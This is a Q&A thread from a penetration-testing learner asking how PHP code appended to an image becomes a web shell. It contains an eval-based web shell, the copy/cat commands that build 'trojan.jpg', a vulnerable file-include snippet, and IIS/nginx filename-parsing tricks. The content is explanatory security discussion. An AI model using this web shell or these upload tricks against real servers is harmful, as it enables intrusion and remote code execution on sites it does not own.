# How is the backdoor code executed in the end of an image?

Tags: php, steganography, penetration-testing

(seems this is called "picture steganography"， 图片隐写术 in Chinese)

I am study the penetration testing , and found a very interesting method:

Giving 2 files:

1. an jpg/gif/png file named as: `mask.jpg`
2. a code snipped like `<?php @eval($_POST[‘pass’]);?>`, saved as `backdoor.php`

and put these 2 files together:

- windows: `copy /b mask.jpg + backdoor.php/a = trojan.jpg`
- linux:   `cat mask.jpg backdoor.php > trojan.jpg`

the `trojan.jpg` file content is very simple, just like:

```
F4�5�o�0KsK�vkjf�/2�S�2?>j�h����$�먬*o����Vjߥ�i�^��(G�,�Ь��
a��9��w^5�P��q�4�*��}G����тU4��+<m▒k���2��r��Ӎ�G���!r�UT��������� R��MI�8'�3IR�TQ��x0�"�����|����yFT��j��(▒9��k�R;▒�����7Z�G�ISGS�G=^�P��8����A�/����E�t���P�G�������y�F�!�?�y
-zh��=�"��������6�k�DT�{��)OQO�A7�w]0�����N1���aV�-G����4�~F�~��˞��2OU(�����u?��������H�w
�k��<?php @eval($_POST['pass']) ?>
```

and then upload this `trojan.jpg` file to some php website, then visit its url such as `http://target.com/uploads/trojan.jpg`

then using some script/tools you will connet and get the webshell.

I am wondering, how is the `backdoor` code executed in the end of the image file?

thanks a lot!

Comment: I tried to upload it on my own created website. The website itself restrict it to upload. You should check the file yourself using custom coding whether the file is secure or not.

Comment: What's the content of `mask.jpg`, must be pretty special ... Also "upload to some PHP website ..." is ambiguous. What is interpreting or serving the PHP? You'd have to be targeting a specific vunerable back-end or server miss-configuration.

Comment: @semisecure the `mask.jpg` is very simple ,just the normal image.  and "upload to some PHP website",  you are right, maybe this is the key point. I will still researching for this.

Comment: It doesn't. Unless the PHP backend tries to _interpret_ the image code (e.g. you upload it with the name `trojan.php` and the server is so bad that it accepts that, so that when you use `<img src="trojan.php">` that _actually tries to execute the file_). No sane, well tested PHP server implementation will, though: they will run the image through a sanitizer (as all user-submitted data should be) before allowing it through.

Comment: I think what you're thinking of/looking at is this: https://book.hacktricks.xyz/pentesting-web/file-upload. Completely different methodology

Comment: @Darren thanks a lot for your link. It's very helpful, I will read it later.

Answer (score 1):

OK, after hours of googling , I think I know something.

1. In normal way, png/jpg files will not trigger php engine to process. e.g. when you open a page containing `<img src='a.jpg' />`. But there are exceptions.
2. Most cases this "Image Backdoor" or "Steganography" is used together with "file include leak".

According to [this article](https://blog.csdn.net/qq_42311391/article/details/89477993?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-7.baidujs&dist_request_id=&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-7.baidujs), to make the `jpg` files processed by `php` engine, the server side must has leaks of "file including" . the simplest "file include leak" example is shown as below:

```php
<!-- vulnerable_file_include.php -->
<?php
  $file = $_GET['file']
  include $file;
?>
```

then you can run that "php code" in that jpg file as php:  `http://example.com/vulnerable_file_include.php?file=a.jpg`

3. You can also do some tricks by renaming the jpg file as an unnormal way (containing `php` in the file name), according to [this article](https://myblackmanba.github.io/2018/01/07/%E6%9C%A8%E9%A9%AC%E5%88%B6%E4%BD%9C%E5%8F%8A%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/)  ,

   (a) for IIS 5.0/6 , visiting `a.asp;.jpg` will trigger `a.asp` be executed.

   (b) for IIS 7.0/7.5, visiting `a.php/.jpg` will trigger `a.php` be executed.

   (c) for nginx 8.03, visiting `a.php%00.jpg` will trigger `a.php` be executed.
4. Many of the PHP/ASP website will show the image in this way: `<img src="read.php?file=a.jpg" />` ( 15 years ago when I first time envolved a project, the stuff engineer stored the images in to databases, and read it out in this way). PHP engine will read and parse the source code of `a.jpg`, so the malicious code is executed.
5. In some server configuration, static assets ( such as jpg, png) should be process by nginx or apache, but incorrectly configured to be processed by PHP/ASP engine. (Maybe this is the case, not 100% confirmed.)

Also refer to:

https://medium.com/@GaelleTjat/a-webshell-story-59ffd84ef012

[Running PHP inside PNG](https://stackoverflow.com/questions/11430342/running-php-inside-png)

https://blog.csdn.net/qq_42311391/article/details/89477993

https://chybeta.github.io/2017/10/08/php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/